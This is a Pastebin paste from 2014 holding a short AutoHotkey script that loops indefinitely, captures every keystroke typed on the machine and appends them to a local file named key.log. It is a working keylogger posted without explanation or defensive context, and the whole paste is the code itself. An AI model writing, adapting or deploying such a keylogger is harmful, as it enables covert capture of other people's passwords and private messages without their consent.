Advertisement
Ex0rpl4net

Untitled

Sep 3rd, 2014
227
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.13 KB | None | 0 0
  1. #NoEnv
  2. SendMode Input
  3. SetWorkingDir %A_ScriptDir%
  4. #singleinstance force
  5. loop{
  6. Input, key, V T5,
  7. FileAppend, %key%, key.log
  8. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement